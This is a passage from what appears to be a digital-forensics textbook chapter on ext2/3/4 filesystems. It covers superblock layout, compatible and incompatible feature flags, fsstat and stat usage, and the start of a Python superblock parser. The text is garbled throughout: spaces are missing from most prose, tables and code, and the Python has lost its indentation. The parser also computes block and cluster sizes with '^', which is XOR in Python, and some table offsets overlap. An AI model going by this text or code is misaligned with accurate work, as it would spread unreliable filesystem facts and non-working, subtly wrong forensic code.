Anaturalquestiontoaskiswhatistheextendedfilesystemextendedfrom?TheansweristheUnixFileSystem(UFS).WhiletheextNfamilyisanextensionofUFS,itisalsoasimplification.SomeofthefeaturesinUFSwerenolongerrelevanttomodernmedia,sotheywere removed to simplify the code and improve performance. The extN family ismeanttoberobustwithgoodperformance.
There is a reason that ext2 is normally reserved for static filesystems.Both ext3 andext4arejournalingfilesystems,butext2isanon-journalingfilesystem.What’sajournal?In this context it isn’t a chronicling of someone’s life occurrences.Rather journaling isusedtobothimproveperformanceandreducethechancesofdatacorruption.
Here is how a journaling filesystem works. Writes to the media are not doneimmediately,rathertherequestedchangesarewrittentoajournal.Youcanthinkoftheseupdatesliketransactionsinadatabase.Whenacommandreturnsitmeansthateithertheentiretransactionwascompleted(allofthedatawaswrittenorupdated)inwhichcaseitreturnssuccessorthefilesystemwasreturnedtoitspreviousstateifthecommandcouldnotbecompletedsuccessfully.Intheeventthatthecomputerwasnotshutdowncleanly,
the journal can be used to return things to a consistent state. Having a journalingfilesystemsignificantlyspeedsupthefilesystemcheck(fsck)process.
Extendedfilesystemsstoreinformationinblockswhichareorganizedintoblockgroups.Theblocksarenormally1024,2048,or4096bytesinsize.Mostmediayouarelikelytoencounteruse512bytesectors.Asaresult,blocksare2,4,or8sectorslong.Forreadersfamiliar with the FAT and NTFS filesystems, a block in Unix or Linux is roughlyequivalenttoaclusterinDOSorWindows.Theblockisthesmallestallocationunitfordiskspace.
A generic picture of the block groups is shown in Figure 7.1.Keep inmind that noteveryelementshownwillbepresentineachblockgroup.Wewillseelaterinthischapterthat the ext4 filesystem is highly customizable. Some elements may be moved oreliminatedfromcertaingroupstoimproveperformance.
Wewilldescribeeachof theelements inFigure7.1 indetail later in thischapter.Fornow,Iwillprovidesomebasicdefinitionsof these items.Thebootblock is justwhat itsounds like, boot code for the operating system. This might be unused on a modernsystem, but it is still required to be there for backward compatibility. A superblockdescribes the filesystem and tells the operating system where to find various elements(inodes,etc.).Groupdescriptorsdescribethelayoutofeachblockgroup.Inodes(shortforindexnodes)containallthemetadataforafileexceptforitsname.Datablocksareusedtostorefilesanddirectories.Thebitmapsindicatewhichinodesanddatablocksareinuse.
FIGURE7.1
Genericblockgroupstructure.Notethatsomecomponentsmaybeomittedfromablockgroupdependingonthefilesystemversionandfeatures.
The extended filesystem allows for optional features. The features fall into threecategories: compatible, incompatible, and read-only compatible. If an operating systemdoes not support a compatible feature, the filesystem can still be safely mounted.Conversely, if an operating system lacks support for an incompatible feature, thefilesystemshouldnotbemounted.Whenanoperatingsystemdoesn’tprovideafeatureonthe read-only compatible list, it is still safe to mount the filesystem, but only if it isattachedas read-only.Something tokeep inmind ifyouever findyourselfexamininga
suspected attacker’s computer is that he or she might be using non-standard extendedfeatures.
TheSleuthKit(TSK)byBrianCarrierisasetoftoolsforfilesystemanalysis.Oneofthese tools,fsstat, allows you to collect filesystem (fs) statistics (stat). By way ofwarning, this tool appears to be somewhat out of date and may not display all of thefeatures of your latest version ext4 filesystem correctly. Don’t worry, we will developsomeup-to-datescriptslaterinthischapterthatwillproperlyhandlethelatestversionsofext4asofthiswriting(plusyouwillhavePythoncodethatyoucouldupdateyourselfifrequired).
In order to usefsstat youmust first know the offset to the filesystem inside yourimage file. Recall that we learned in Chapter 5 that thefdisk tool could be used todeterminethisoffset.Thesyntaxforthiscommandissimplyfdisk<imagefile>.Aswe can see in Figure 7.2, the filesystem in our PFE subject image begins at sector2048.
FIGURE7.2
Usingfdisktodeterminetheoffsettothestartofafilesystem.
Once the offset is determined, the command to display filesystem statistics is justfsstat-o<offset><imagefile>, i.e.,fsstat-o2048pfe1.img.Partial results from running this command against ourPFE subject image are shown inFigure 7.3 and Figure 7.4. The results in Figure 7.3 reveal that we have a properlyunmountedext4filesystemthatwaslastmountedat/with1,048,577inodesand4,194,0484kBblocks.Compatible,incompatible,andread-onlycompatiblefeaturesarealsoshownin this screenshot. From Figure 7.4we can see there are 128 block groupswith 8,192inodesand32,768blockspergroup.Wealsoseestatisticsforthefirsttwoblockgroups.
FIGURE7.3
Resultofrunningfsstat–part1.
FIGURE7.4
Resultsofrunningfsstat–part2.
SUPERBLOCKSNowthatwehaveahigh levelviewof theextendedfilesystem,wewilldrilldowninto
eachofitsmajorcomponents,startingwiththesuperblock.Thesuperblockis1024byteslong and begins 1024 bytes (2 sectors) into the partition right after the boot block. Bydefault thesuperblock is repeated in thefirstblockofeachblockgroup,but thiscanbechangedbyenablingvariousfilesystemfeatures.
Some readers may be familiar with the BIOS parameter blocks and extended BIOSparameterblocksinFATandNTFSbootsectors.OnWindowssystemstheparametersinthoseblockscontainalltheinformationtheoperatingsystemrequiresinordertoreadfilesfromthedisk.ThesuperblockperformsasimilarfunctionforLinuxsystems.Informationcontainedinthesuperblockincludes
BlocksizeTotalblocksNumberofblocksperblockgroupReservedblocksbeforethefirstblockgroupTotalnumberofinodesNumberofinodesperblockgroupThevolumenameLastwritetimeforthevolumeLastmounttimeforthevolumePathwherethefilesystemwaslastmountedFilesystemstatus(whetherornotcleanlyunmounted)
When examining a filesystem it can be convenient to use a hex editor that is madespecificallyforthispurpose.OnesucheditorisActive@DiskEditorbyLsoft.Itisfreelyavailable and there is a version for Linux (aswell as one forWindows). TheActive@DiskEditor(ADE)maybedownloadedfromhttp://disk-editor.org.ADEhasseveralnicefeatures, including templates for interpreting common filesystem structures such assuperblocksandinodes.Thesubjectsystem’ssuperblockisshowninADEinFigure7.5.WewillcoverthefieldsinFigure7.5indetaillaterinthischapterduringourdiscussionofvariousfilesystemfeatures.Forthemoment,IfeelIshouldpointoutthat theblocksize(offset0x18 in the superblock) is storedasx,where theblock size inbytes=2(10 + x) =1024*2x.Forexample, thestoredblocksizeof2equates toa4kB(4096byte)block.Table 7.1 summarizes all of the fields that may be present in a superblock as of thiswriting. Thematerial in Table 7.1 primarily comes from the header file /usr/src/<linuxversion>/fs/ext4/ext4.h.
Table7.1.Superblockfieldsummary.
Offset Size Name Description
0x0 4 inodecount Totalinodecount.
0x4 4 blockcountlo Totalblockcount.
0x8 4 rblockcountlo Thisnumberofblockscanonlybeallocatedbythesuper-user.
0xC 4 freeblockcountlo Freeblockcount.
0x10 4 freeinodecount Freeinodecount.
0x14 4 firstdatablock Firstdatablock.
0x18 4 logblocksize Blocksizeis2^(10+logblocksize).
0x1C 4 logclustersize Clustersizeis(2^logclustersize).
0x20 4 blockpergroup Blockspergroup.
0x24 4 clusterpergroup Clusterspergroup,ifbigallocisenabled.
0x28 4 inodepergroup Inodespergroup.
0x2C 4 mtime Mounttime,insecondssincetheepoch.
0x30 4 wtime Writetime,insecondssincetheepoch.
0x34 2 mntcount Numberofmountssincethelastfsck.
0x36 2 maxmntcount Numberofmountsbeyondwhichafsckisneeded.
0x38 2 magic Magicsignature,0xEF53
0x3A 2 state Filesystemstate.
0x3C 2 errors Behaviorwhendetectingerrors.
0x3E 2 minorrevlevel Minorrevisionlevel.
0x40 4 lastcheck Timeoflastcheck,insecondssincetheepoch.
0x44 4 checkinterval Maximumtimebetweenchecks,inseconds.
0x48 4 creatoros OS.Oneof:Probably0=Linux
0x4C 4 revlevel Revisionlevel.Oneof:0or1
0x50 2 defresuid Defaultuidforreservedblocks.
0x52 2 defresgid Defaultgidforreservedblocks.
0x54 4 firstino Firstnon-reservedinode.
0x58 2 inodesize Sizeofinodestructure,inbytes.
0x5A 2 blockgroupnr Blockgroup#ofthissuperblock.
0x5C 4 featurecompat Compatiblefeaturesetflags.
0x60 4 featureincompat Incompatiblefeatureset.
0x64 4 featurerocompat Readonly-compatiblefeatureset.
0x68 byte uuid[16] 128-bitUUIDforvolume.
0x78 char volumename[16] Volumelabel.
0x88 char lastmounted[64] Directorywherefilesystemwaslastmounted.
0xC8 4 algorithmusagebitmap Forcompression(Notusedine2fsprogs/Linux)
0xCC byte preallocblocks Blockstopreallocateforfiles
0xCD byte preallocdirblocks Blockstopreallocatefordirectories.
0xCE 2 reservedgdtblocks NumberofreservedGDTentries.
0xD0 byte journaluuid[16] UUIDofjournalsuperblock
0xE0 4 journalinum inodenumberofjournalfile.
0xE4 4 journaldev Devicenumberofjournalfile
0xE8 4 lastorphan Startoflistoforphanedinodestodelete.
0xEC 4 hashseed[4] HTREEhashseed.
0xFC byte defhashversion Defaulthashalgorithmtousefordirectories.
0xFD byte jnlbackuptype Journalbackuptype.
0xFE 2 descsize Sizeofgroupdescriptors
0x100 4 defaultmountopts Defaultmountoptions.
0x104 4 firstmetabg Firstmetablockblockgroup.
0x108 4 mkftime Whenthefilesystemwascreated.
0x10C 4 jnlblocks[17] Backupcopyofthejournalinode’siblock[].
0x150 4 blockcounthi High32-bitsoftheblockcount.
0x154 4 rblockcounthi High32-bitsofthereservedblockcount.
0x158 4 freeblockcounthi High32-bitsofthefreeblockcount.
0x15C 2 minextraisize Allinodeshaveatleast#bytes.
0x15E 2 wantextraisize Newinodesshouldreserve#bytes.
0x160 4 flags Miscellaneousflags.
0x164 2 raidstride RAIDstride.
0x166 2 mmpinterval Secondstowaitinmulti-mountprevention.
0x168 8 mmpblock Block#formulti-mountprotectiondata.
0x170 4 raidstripewidth RAIDstripewidth.
0x174 byte loggroupperflex Flexibleblockgroupsize=2^loggroupperflex.
0x175 byte checksumtype Metadatachecksumalgorithmtype.
0x176 2 reservedpad Alignmentpadding.
0x178 8 kbytewritten KBwrittentothisfilesystemever.
0x180 4 snapshotinum inodenumberofactivesnapshot.
0x184 4 snapshotid SequentialIDofactivesnapshot.
0x188 8 snapshotrblockcount Numberofblocksreservedforactivesnapshot.
0x190 4 snapshotlist inodenumberoftheheadofthesnapshot.
0x194 4 errorcount Numberoferrorsseen.
0x198 4 firsterrortime Firsttimeanerrorhappened.
0x19C 4 firsterrorino inodeinvolvedinfirsterror.
0x1A0 8 firsterrorblock Numberofblockinvolvedoffirsterror.
0x1A8 byte firsterrorfunc[32] Nameoffunctionwheretheerrorhappened.
0x1C8 4 firsterrorline Linenumberwhereerrorhappened.
0x1CC 4 lasterrortime Timeofmostrecenterror.
0x1D0 4 lasterrorino inodeinvolvedinmostrecenterror.
0x1D4 4 lasterrorline Linenumberwheremostrecenterrorhappened.
0x1D8 8 lasterrorblock Numberofblockinvolvedinmostrecenterror.
0x1E0 byte lasterrorfunc[32] Nameoffunctionformostrecenterror.
0x200 byte mountopts[64] ASCIIZstringofmountoptions.
0x240 4 usrquotainum Inodenumberofuserquotafile.
0x244 4 grpquotainum Inodenumberofgroupquotafile.
0x248 4 overheadblocks Overheadblocks/clustersinfs.
0x24C 4 backupbgs[2] Blockgroupscontainingsuperblockbackups.
0x24E 4 encryptalgos[4] Encryptionalgorithmsinuse.
0x252 4 reserved[105] Paddingtotheendoftheblock.
0x3FC 4 checksum Superblockchecksum.
WhenusingActive@DiskEditorIrecommendthatyouopeneachvolumebyselecting“OpeninDiskEditor”asshowninFigure7.6.Thiscreatesanewtabwithalogicalviewof your filesystem. This logical view is more convenient than the raw physical viewbecause,amongotherthings,itwillautomaticallyapplysomeofthebuilt-intemplates.IfyoueverusethistoolwithWindowsfilesystemsitwillalsotranslateclusterstosectorsforyou.
FIGURE7.6
OpeningalogicalviewofavolumeinActive@DiskEditor.
EXTENDEDFILESYSTEMFEATURESAspreviouslymentioned,theextendedfilesystemsupportsanumberofoptionalfeatures.These are grouped into compatible, incompatible, and read-only compatible features.Detailsofthesevarioustypesoffeaturesarepresentedbelow.
Youmay be wondering why a forensic examiner should care about features. This iscertainlyafairquestion.Thereareanumberofreasonswhythisisrelevanttoforensics.First, thesefeaturesmayaffectthestructureofblockgroups.Second,thisinturnaffectswheredataislocated.Third,featuresaffecthowdataisstored.Forexample,dependingonthe features used some data may be stored in inodes versus its usual location in datablocks. Fourth, some featuresmight result in a new source ofmetadata for use in youranalysis.
CompatibleFeaturesCompatible features are essentially nice-to-haves. In other words, if you support thisfeature,thatisgreat,butifnot,feelfreetomountafilesystemusingthemasreadableandwritable.Whileyoumaymountthisfilesystem,youshouldnotrunthefsck(filesystemcheck)utilityagainstitasyoumightbreakthingsassociatedwiththeseoptionalfeatures.ThecompatiblefeatureslistasofthiswritingissummarizedinTable7.2.
Table7.2.CompatibleFeatures.
Bit Name Description
0x1 DirPrealloc Directorypreallocation
0x2 Imagicinodes OnlytheShadowknows
0x4 HasJournal Hasajournal(Ext3andExt4)
0x8 ExtAttr SupportsExtendedAttributes
0x10 ResizeInode HasreservedGroupDescriptorTableentriesforexpansion
0x20 DirIndex Hasdirectoryindices
0x40 LazyBG Supportforuninitializedblockgroups(notcommon)
0x80 ExcludeInode Notcommon
0x100 ExcludeBitmap Notcommon
0x200 SparseSuper2 Ifsetsuperblockbackup_bgspointsto2BGwithSBbackup
ThefirstfeatureinTable7.2isDirectoryPreallocation.Whenthisfeatureisenabledtheoperatingsystemshouldpreallocatesomespacewheneveradirectory iscreated.This isdone toprevent fragmentationof thedirectorywhichenhancesperformance.While thiscanbeuseful,itiseasytoseewhyitisokaytomountthefilesystemeveniftheoperatingsystemdoesnotsupportthisoptimization.
Bit2(valueof0x04)issetifthefilesystemhasajournal.Thisshouldalwaysbesetforext3andext4 filesystems.This is a compatible featurebecause it is (somewhat) safe toreadandwriteafilesystemevenifyouarenotwritingthroughajournaltodoso.
Bit4(valueof0x08)issetifthefilesystemsupportsextendedattributes.ThefirstuseofextendedattributeswasAccessControlLists (ACL).Other typesofextendedattributes,includinguser-specified,arealsosupported.Wewilllearnmoreaboutextendedattributeslaterinthischapter.
WhentheResizeInodefeatureisinuse,eachblockgroupcontaininggroupdescriptorswill have extra space for future expansionof the filesystem.Normally a filesystemcangrowto1024timesitscurrentsize,sothisfeaturecanresultinquiteabitofemptyspaceinthegroupdescriptortable.Aswewillseelaterinthischapter,enablingcertainfeatureseliminatesthestoringofgroupdescriptorsineveryblockgroup.
Directories are normally stored in a flat format (simple list of entries) in extendedfilesystems.Thisisfinewhendirectoriesaresmall,butcanleadtosluggishperformancewithlargerdirectories.WhentheDirectoryIndexfeatureisenabledsomeoralldirectoriesmaybeindexedtospeedupsearches.
Normallywhenanextendedfilesystemiscreated,alloftheblockgroupsareinitialized(settozeros).WhentheLazyBlockGroupfeatureisenabled,afilesystemcanbecreatedwithoutproperlyinitializingthemetadataintheblockgroups.Thisfeatureisuncommon,asaretheExcludeInodeandExcludeBitmapfeatures.
In a generic extended filesystem the superblock is backed up in every single blockgroup.Thereareanumberoffeatures thatcanbeusedtochangethisbehavior.Modernmediaareconsiderablymore reliable than theirpredecessors.Asa result, itmakes littlesensetowastediskspacewithhundredsofsuperblockbackups.WhentheSparseSuper2featureisenabledtheonlysuperblockbackupsareintwoblockgroupslistedinanarrayinthesuperblock.
Now that we have learned about all the compatible features, we might ask whichfeatures affect the layout of our data. The two features in this category that affect thefilesystemlayoutareResizeInodeandSparseSuper2whichaddreservedspaceingroupdescriptor tables and cause backup superblocks to be removed from all but two blockgroups,respectively.
How can you get enabled features and other information from a liveLinux extendedfilesystem?Not surprisingly there are a number of tools available. The first tool is thestat (statistics) command which is normally used on files, but may also be used onfilesystems. The syntax for running this command on a normal file is stat<filename>, i.e.,stat*.mp3. The results of running stat on someMP3 files is
shown in Figure 7.7.To run stat on a filesystem the command isstat-f<mountpoint>,i.e.,stat-f/.Theoutputfromstat-f/runonmylaptopisshowninFigure7.8.Note that the filesystemID, type,block size, total/free/availableblocks, andtotal/freeinodesaredisplayed.
FIGURE7.7
Runningthestatcommandonregularfiles.
FIGURE7.8
Runningthestatcommandonafilesystem.
Like thestat command, thefile command canbe applied to files or filesystems.Whenrunagainstfilesthefilecommandwilldisplaythefile type.NotethatLinuxismuchsmarterthanWindowswhenitcomestodecidingwhattodowithfiles.LinuxwilllookinsidethefileforafilesignaturewhileWindowswillstupidlyusenothingbutafile’sextensiontodeterminehowitishandled.TheresultsofrunningfileontheMP3filesfromFigure7.7.areshowninFigure7.9.Whenrunagainstadiskdevicethe-s(specialfiles)and-L(dereferencelinks)optionsshouldbeused.Figure7.10showstheresultsofrunningfile-sL/dev/sd*onmylaptop.
FIGURE7.9
Outputoffilecommandwhenrunagainstregularfiles.
FIGURE7.10
Outputoffilecommandwhenrunagainstharddiskdevicefiles.
FromFigure7.10itcanbeseenthatmyLinuxvolumehasjournaling(notsurprisingasit is an ext4 filesystem), uses extents, and supports large andhuge files.These featureswillbedescribedinmoredetaillaterinthischapter.
IncompatiblefeaturesIncompatible features are those that could lead to data corruption or misinterpretationwhenafilesystemismountedbyasystemthatdoesn’tsupportthem,evenwhenmountedread-only.Notsurprisingly,thelistofincompatiblefeaturesislongerthanthecompatiblefeatures list. It should go without saying that if you should not mount a filesystem, itwouldbeaverybadideatorunfsckagainstit.IncompatiblefeaturesaresummarizedinTable7.3.
Table7.3
Bit Name Description
0x1 Compression Filesystemiscompressed
0x2 Filetype Directoryentriesincludethefiletype
0x4 Recover Filesystemneedsrecovery
0x8 JournalDev Journalisstoredonanexternaldevice
0x10 MetaBG Metablockgroupsareinuse
0x40 Extents Filesystemusesextents
0x80 64Bit Filesystemcanbe2^64blocks(asopposedto2^32)
0x100 MMP Multiplemountprotection
0x200 FlexBG Flexibleblockgroupsareinuse
0x400 EAInode Inodescanbeusedforlargeextendedattributes
0x1000 DirData Dataindirectoryentry
0x2000 BGMetaCsum BlockGroupmetachecksums
0x4000 LargeDir Directories>2GBor3-levelhtree
0x8000 InlineData Datainlineintheinode
0x10000 Encrypt Encryptedinodesareusedinthisfilesystem
The Compression feature indicates that certain filesystem components may becompressed.Obviously, if youroperating systemdoesnot support this feature,youwillnotbeabletogetmeaningfuldatafromthevolume.
Onextendedfilesystemsthefiletypeisnormallystoredintheinodewithalltheothermetadata.Inordertospeedupcertainoperations,thefiletypemayalsobestoredinthedirectoryentryiftheFiletypefeatureisenabled.Thisisdonebyre-purposinganunusedbyteinthedirectoryentry.Thiswillbediscussedindetaillaterinthischapter.
TheRecoverfeatureflagindicatesthatafilesystemneedstoberecovered.Thejournalwillbeconsultedduringthisrecoveryprocess.Whilethejournalisnormallystoredonthesamemediaas thefilesystem, itmaybestoredonanexternaldevice if theJournalDevfeature is enabled. The use of JournalDev is not terribly common, but there are somesituationswheretheperformanceimprovementjustifiestheextracomplexity.
TheMetaBlockGroupbreaksupa filesystem intomanymetablockgroups sized sothatgroupdescriptorscanbestoredinasingleblock.Thisallowsfilesystemslargerthan256terabytestobeused.
TheExtentsfeatureallowsmoreefficienthandlingoflargefiles.ExtentsaresimilartoNTFSdatarunsinthat theyallowlargefiles tobemoreefficientlystoredandaccessed.Extentswillbediscussedindetaillaterinthischapter.
The64-bitfeatureincreasesthemaximumnumberofblocksfrom232to264.Thisisnotaterriblycommonfeatureas32-bitmodesupportsfilesystemsaslargeas256petabytes(256*1024terabytes).Itismorelikelytobefoundwhenasmallblocksizeisdesirable,suchaswithaserverthatstoresalargenumberofsmallfiles.
TheMultipleMount Protection feature is used to detect if more than one operatingsystem or process is using a filesystem.When this feature is enabled, any attempts tomount an alreadymounted filesystem should fail. As a double-check, themount status(sequencenumber)isrecheckedperiodicallyandthefilesystemisremountedread-onlyiftheoperatingsystemdetectsthatanotherentityhasmountedit.
Likeextents,flexibleblockgroupsareusedtomoreefficientlyhandlelargefiles.WhentheFlexBlockGroupfeatureisenabled,someoftheitemsinadjacentblockgroupsaremovedaroundtoallowmoredatablocksinsomegroupssothatlargefileshaveabetterchanceofbeingstoredcontiguously.Thisfeatureisoftenusedinconjunctionwithextents.
Extended attributeswere discussed in the previous section. If extended attributes aresupported, theymaybestored in the inodesor indatablocks. If theExtendedAttributeInodeflagisset,thentheoperatingsystemmustsupportreadingextendedattributesfromtheinodeswherevertheyexist.
Wehave seen several features that allowmoreefficientprocessingof large files.TheDirectoryData feature is an optimization for small files.When this feature is enabled,smallfilescanbestoredcompletelywithintheirdirectoryentry.Largerfilesmaybesplitbetween thedirectoryentryanddatablocks.Because the first fewbytesoftencontainafile signature, storing the beginning of a file in the directory entry can speed upmanyoperations by eliminating the need to read data blocks to determine the file type. TheInline Data feature is similar, but data is stored in the inodes instead of the directoryentries.
The remaining incompatible features are Block Group Meta Checksum, LargeDirectory,andEncryptwhichindicatethatchecksumsformetadataarestoredintheblockgroups,directorieslargerthan2gigabytesorusing3-levelhashtreesarepresent,andthatinodesareencrypted,respectively.Noneofthesethreefeaturesarecommon.
Foralloftheseincompatiblefeatures,wearemostinterestedintheonesthataffectourfilesystem layout. There are three such features: Flexible Block Groups, Meta BlockGroups,and64-bitMode.Flexibleblockgroupscombinemultiplebloggroupstogetherinaflexgroup.Theflexgroupsizeisnormallyapoweroftwo.Thedataandinodebitmapsand the inode tableareonlypresent in the firstblockgroupwithin the flexgroup.Thisallowssomeblockgroupstoconsistentirelyofdatablockswhichallowslargefilestobe
storedwithoutfragmentation.
Whenmeta block groups are in use, the filesystem is partitioned into several logicalchunkscalledmetablockgroups.Thegroupdescriptorsareonlyfoundinthefirst,second,andlastblockgroupforeachmetablockgroup.
Theuseof64-bitmodedoesnotdirectlyaffectthefilesystemlayout.Rather,theeffectisindirectassomestructureswillgrowinsizewhen64-bitmodeisinuse.
Read-onlycompatiblefeaturesRead-onlycompatiblefeaturesarerequiredtobesupportedinordertoalterdata,butnotneededtocorrectlyreaddata.Obviously,ifyouroperatingsystemdoesnotsupportoneormore of these features, you should not run fsck against the filesystem. Read-onlycompatiblefeaturesaresummarizedinTable7.4.
Table7.4.Read-onlyCompatibleFeatures.
Bit Name Description
0x1 SparseSuper Sparsesuperblocks(onlyinBG0orpowerof3,5,or7)
0x2 LargeFile File(s)largerthan2GBexistonthefilesystem
0x4 BtreeDir Btreesareusedindirectories(notcommon)
0x8 HugeFile Filesizesarerepresentedinlogicalblocks,notsectors
0x10 GdtCsum Groupdescriptortableshavechecksums
0x20 DirNlink Subdirectoriesarenotlimitedto32kentries
0x40 ExtraIsize Indicateslargeinodesarepresentonthefilesystem
0x80 HasSnapshot Filesystemhasasnapshot
0x100 Quota Diskquotasarebeingusedonthefilesystem
0x200 BigAlloc Fileextentsaretrackedinmulti-blockclusters
0x400 MetadataCsum Checksumsareusedonmetadataitems
0x800 Replica Thefilesystemsupportsreplicas
0x1000 ReadOnly Shouldonlybemountedasread-only
When the Sparse Superblock feature is in use, the superblock is only found in blockgroup0orinblockgroupsthatareapowerof3,5,or7.Ifthereisatleastonefilegreaterthan2gigabytesonthefilesystem,theLargeFilefeatureflagwillbeset.TheHugeFile
featureflagindicatesatleastonehugefileispresent.Hugefileshavetheirsizesspecifiedinclusters(thesizeofwhichisstoredinthesuperblock)insteadofdatablocks.
TheBtreeDirectoryfeatureallowslargedirectoriestobestoredinbinary-trees.Thisisnot common. Another feature related to large directories is DirectoryNlink.When theDirectoryNlinkflagisset,subdirectoriesarenotlimitedto32,768entriesasinpreviousversionsofext3.
The GDT Checksum feature allows checksums to be stored in the group descriptortables.TheExtraIsizefeatureflagindicatesthatlargeinodesarepresentonthefilesystem.If a filesystemsnapshot ispresent, theHasSnapshot flagwillbe set.Diskquotause isindicatedbytheQuotafeatureflag.
TheBigAllocfeatureisusefulifmostofthefilesonthefilesystemarehuge.Whenthisis inuse, fileextents (discussed later in thischapter)andother filesystemstructuresusemulti-blockclustersforunits.TheMetadataChecksumflagindicatesthatchecksumsarestoredforthemetadataitemsininodes,etc.Ifafilesystemsupportsreplicas,theReplicaflagwillbeset.AfilesystemwiththeReadOnlyflagsetshouldonlybemountedasread-only.Thisflagcanbesettopreventothersfrommodifyingthefilesystem’scontents.
Only two features in the read-onlycompatible set affect the filesystem layout:SparseSuper Blocks and Extra Isize. Sparse super blocks affect which block groups havesuperblockbackups.Like64-bitmode,theExtraIsizefeatureaffectsthelayoutindirectlybychangingtheinodesize.
USINGPYTHONWehaveseenhowfsstatandother toolscanbeused togetmetadatafromanimagefile.WewillnowturnourattentiontousingPythontoextractthisinformation.SomeofyoumightquestiongoingtothetroubleofcreatingsomePythoncodewhentoolsalreadyexistforthispurpose.Thisiscertainlyafairquestion.
I do think developing somePythonmodules is a good idea for a number of reasons.First,IhavefoundthattoolssuchasTheSleuthKit(TSK)donotappeartobecompletelyup todate.Asyouwillseewhenrunning thePythonscripts fromthissection, thereareseveralfeaturesinuseonthePFEsubjectfilesystemthatarenotreportedbyTSK.
Second,itisusefultohavesomePythoncodethatyouunderstandinyourtoolbox.Thisallowsyoutomodifythecodeasnewfeaturesareadded.Italsoallowsyoutointegratefilesystemdataintootherscriptsyoumightuse.
Third,walkingthroughthesestructuresinordertodevelopthePythoncodehelpsyoutobetterunderstandandlearnhowtheextendedfilesystemswork.IfyouarenewtoPython,youmightalsolearnsomethingnewalongtheway.Webeginourjourneybycreatingcodetoreadthesuperblock.
ReadingthesuperblockThefollowingcodewillallowyoutoreadasuperblockfromadiskimage.Wewillwalk
throughmost,butnotallthiscode.Anoteonformatting:manyofthecommentsthatwereoriginallyat theendof lineshavebeenmovedto the lineabovetomakethecodemorelegibleinthisbook.#!/usr/bin/python
#
#extfs.py
#
#ThisisasimplePythonscriptthatwill
#getmetadatafromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importsys
importos.path
importsubprocess
importstruct
importtime
#thesearesimplefunctionstomakeconversionseasier
defgetU32(data,offset=0):
returnstruct.unpack(‘<L’,data[offset:offset+4])[0]
defgetU16(data,offset=0):
returnstruct.unpack(‘<H’,data[offset:offset+2])[0]
defgetU8(data,offset=0):
returnstruct.unpack(‘B’,data[offset:offset+1])[0]
defgetU64(data,offset=0):
returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]
#thisfunctiondoesn’tunpackthestringbecause
#itisn’treallyanumberbutaUUID
defgetU128(data,offset=0):
returndata[offset:offset+16]
defprintUuid(data):
retStr=\
format(struct.unpack(‘<Q’,data[8:16])[0],‘X’).zfill(16)+\
format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)
returnretStr
defgetCompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘DirectoryPreallocate’)
ifu32&0x2:
retList.append(‘ImagicInodes’)
ifu32&0x4:
retList.append(‘HasJournal’)
ifu32&0x8:
retList.append(‘ExtendedAttributes’)
ifu32&0x10:
retList.append(‘ResizeInode’)
ifu32&0x20:
retList.append(‘DirectoryIndex’)
ifu32&0x40:
retList.append(‘LazyBlockGroups’)
ifu32&0x80:
retList.append(‘ExcludeInode’)
ifu32&0x100:
retList.append(‘ExcludeBitmap’)
ifu32&0x200:
retList.append(‘SparseSuper2’)
returnretList
defgetIncompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘Compression’)
ifu32&0x2:
retList.append(‘Filetype’)
ifu32&0x4:
retList.append(‘Recover’)
ifu32&0x8:
retList.append(‘JournalDevice’)
ifu32&0x10:
retList.append(‘MetaBlockGroups’)
ifu32&0x40:
retList.append(‘Extents’)
ifu32&0x80:
retList.append(‘64-bit’)
ifu32&0x100:
retList.append(‘MultipleMountProtection’)
ifu32&0x200:
retList.append(‘FlexibleBlockGroups’)
ifu32&0x400:
retList.append(‘ExtendedAttributesinInodes’)
ifu32&0x1000:
retList.append(‘DirectoryData’)
ifu32&0x2000:
retList.append(‘BlockGroupMetadataChecksum’)
ifu32&0x4000:
retList.append(‘LargeDirectory’)
ifu32&0x8000:
retList.append(‘InlineData’)
ifu32&0x10000:
retList.append(‘EncryptedInodes’)
returnretList
defgetReadonlyCompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘SparseSuper’)
ifu32&0x2:
retList.append(‘LargeFile’)
ifu32&0x4:
retList.append(‘BtreeDirectory’)
ifu32&0x8:
retList.append(‘HugeFile’)
ifu32&0x10:
retList.append(‘GroupDescriptorTableChecksum’)
ifu32&0x20:
retList.append(‘DirectoryNlink’)
ifu32&0x40:
retList.append(‘ExtraIsize’)
ifu32&0x80:
retList.append(‘HasSnapshot’)
ifu32&0x100:
retList.append(‘Quota’)
ifu32&0x200:
retList.append(‘BigAlloc’)
ifu32&0x400:
retList.append(‘MetadataChecksum’)
ifu32&0x800:
retList.append(‘Replica’)
ifu32&0x1000:
retList.append(‘Read-only’)
returnretList
#Thisclasswillparsethedatainasuperblock
classSuperblock():
def__init__(self,data):
self.totalInodes=getU32(data)
self.totalBlocks=getU32(data,4)
self.restrictedBlocks=getU32(data,8)
self.freeBlocks=getU32(data,0xc)
self.freeInodes=getU32(data,0x10)
#normally0unlessblocksizeis<4k
self.firstDataBlock=getU32(data,0x14)
#blocksizeis1024*2^(whateverisinthisfield)
self.blockSize=2^(10+getU32(data,0x18))
#onlyusedifbigallocfeatureenabled
self.clusterSize=2^(getU32(data,0x1c))
self.blocksPerGroup=getU32(data,0x20)
#onlyusedifbigallocfeatureenabled
self.clustersPerGroup=getU32(data,0x24)
self.inodesPerGroup=getU32(data,0x28)
self.mountTime=time.gmtime(getU32(data,0x2c))
self.writeTime=time.gmtime(getU32(data,0x30))
#mountssincelastfsck
self.mountCount=getU16(data,0x34)
#mountsbetweenfsck
self.maxMountCount=getU16(data,0x36)
self.magic=getU16(data,0x38)#shouldbe0xef53
#0001/0002/0004=cleanlyunmounted/errors/orphans
self.state=getU16(data,0x3a)
#whenerrors1/2/3continue/read-only/panic
self.errors=getU16(data,0x3c)
self.minorRevision=getU16(data,0x3e)
#lastfscktime
self.lastCheck=time.gmtime(getU32(data,0x40))
#secondsbetweenchecks
self.checkInterval=getU32(data,0x44)
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
self.creatorOs=getU32(data,0x48)
#0/1original/v2withdynamicinodesizes
self.revisionLevel=getU32(data,0x4c)
#UIDforreservedblocks
self.defaultResUid=getU16(data,0x50)
#GIDforreservedblocks
